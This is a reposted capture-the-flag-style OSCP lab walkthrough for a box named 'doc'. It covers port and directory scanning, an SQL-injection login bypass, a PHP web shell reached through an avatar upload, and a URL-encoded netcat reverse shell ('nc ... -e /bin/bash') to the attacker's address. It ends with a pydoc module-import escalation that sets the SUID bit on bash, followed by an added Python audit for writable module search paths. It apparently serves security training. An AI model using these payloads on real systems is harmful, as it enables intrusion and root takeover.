【OSCP】doc

admin, 2024-04-22 02:39:18

OSCP practice lab


Lab overview

doc

easy

CMS getshell, SQL injection, arbitrary file upload, credential harvesting, port forwarding, socat usage, privilege escalation via Python module abuse

Information gathering

Host discovery

[screenshot: host discovery output]

Port scan

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.31.215
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-13 05:15 EST
Nmap scan report for doc (192.168.31.215)
Host is up (0.00074s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.18.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: nginx/1.18.0
|_http-title: Online Traffic Offense Management System - PHP
MAC Address: 08:00:27:73:E3:AB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms doc (192.168.31.215)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.16 seconds


Directory scan

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.215 -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.215
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.215/index.php (Status: 200) [Size: 14323]
http://192.168.31.215/about.html (Status: 200) [Size: 1491]
http://192.168.31.215/home.php (Status: 500) [Size: 229]
http://192.168.31.215/uploads (Status: 301) [Size: 169] [--> http://192.168.31.215/uploads/]
http://192.168.31.215/pages (Status: 301) [Size: 169] [--> http://192.168.31.215/pages/]
http://192.168.31.215/admin (Status: 301) [Size: 169] [--> http://192.168.31.215/admin/]
http://192.168.31.215/assets (Status: 301) [Size: 169] [--> http://192.168.31.215/assets/]
http://192.168.31.215/plugins (Status: 301) [Size: 169] [--> http://192.168.31.215/plugins/]
http://192.168.31.215/database (Status: 301) [Size: 169] [--> http://192.168.31.215/database/]
http://192.168.31.215/classes (Status: 301) [Size: 169] [--> http://192.168.31.215/classes/]
http://192.168.31.215/config.php (Status: 200) [Size: 0]
http://192.168.31.215/dist (Status: 301) [Size: 169] [--> http://192.168.31.215/dist/]
http://192.168.31.215/404.html (Status: 200) [Size: 198]
http://192.168.31.215/inc (Status: 301) [Size: 169] [--> http://192.168.31.215/inc/]
http://192.168.31.215/build (Status: 301) [Size: 169] [--> http://192.168.31.215/build/]
http://192.168.31.215/libs (Status: 301) [Size: 169] [--> http://192.168.31.215/libs/]

Add a hosts entry for the domain name

Gaining access

Get into the system's admin backend with a "universal password" (SQL injection login bypass)

The avatar upload has an arbitrary file upload vulnerability. Uploading a phpinfo file shows that it is parsed and executed as PHP.

http://doc.hmv/uploads/drivers/1.php?cmd=nc%20192.168.31.11%208888%20-e%20/bin/bash


Log in as the bella user with the harvested credentials

Privilege escalation

Running the doc program starts a web service.

Dumping its strings with strings shows that it runs pydoc3.9 -p 7890.

Looking at the pydoc3.9 module, all it does is call cli(). We tried to tamper with its contents but did not have permission.

Using socat to forward the port, we can reach the started service, which lists some Python modules:

nohup socat tcp-listen:5000,fork tcp:127.0.0.1:7890 &
sudo doc

Create a .py file under /home/bella, and it shows up in the web service.

Next, write the following code into the file we just created, then visit it again through the web service: the command runs and sets the SUID bit on bash.

import os

# pydoc imports the module to render its documentation page, which runs this
# top-level code; since doc was started through sudo, it runs as root.
os.system("chmod +s /bin/bash")
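The weakness behind this privilege escalation is that a root-run interpreter (pydoc3.9 started through sudo doc) imports modules from directories the low-privileged user controls. As an added example that is not part of the original write-up, the following Python audit flags entries on an interpreter's module search path that a given non-root user could plant a module in; the user/group ids and the "current directory" handling are assumptions for the demonstration, not details taken from the box.

```python
import os
import stat
import sys


def user_can_write(path, uid, gids):
    """True if user `uid` (member of groups `gids`) could create a file in `path`.

    A missing entry is judged by its nearest existing ancestor: if the user can
    create the directory, the interpreter will search it once it exists. The
    sticky bit is deliberately ignored; it never prevents creating new files.
    """
    path = os.path.abspath(path)
    while not os.path.exists(path):          # climb to the closest existing parent
        path = os.path.dirname(path)
    st = os.stat(path)
    if not stat.S_ISDIR(st.st_mode):
        return False                         # zip/egg path entries are out of scope
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit_search_path(paths, uid, gids, cwd=None):
    """Return the resolved sys.path-style entries that `uid` could plant a module in.

    An empty entry means "the current directory", which is what an interpreter
    started from a user's home (sudo doc run from /home/bella) searches first.
    """
    cwd = cwd or os.getcwd()
    hits = []
    for entry in paths:
        resolved = os.path.abspath(entry) if entry else cwd
        if user_can_write(resolved, uid, gids):
            hits.append(resolved)
    return hits


if __name__ == "__main__":
    # Check this interpreter's own search path for a hypothetical low-privileged
    # user; run it under the same privileged interpreter that sudo would launch.
    victim_uid, victim_gids = 1000, {1000}  # assumed ids, replace with the real user
    for hit in audit_search_path(sys.path, victim_uid, victim_gids):
        print(f"uid {victim_uid} can write to search path entry: {hit}")
```

Any entry it reports is one where a non-root user's module would shadow or be picked up by the privileged interpreter; such directories should be root-owned and not group- or world-writable.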


End


Originally published on the WeChat public account 贝雷帽SEC: 【OSCP】doc

Reposted by CN-SEC: https://cn-sec.com/archives/2674812.html
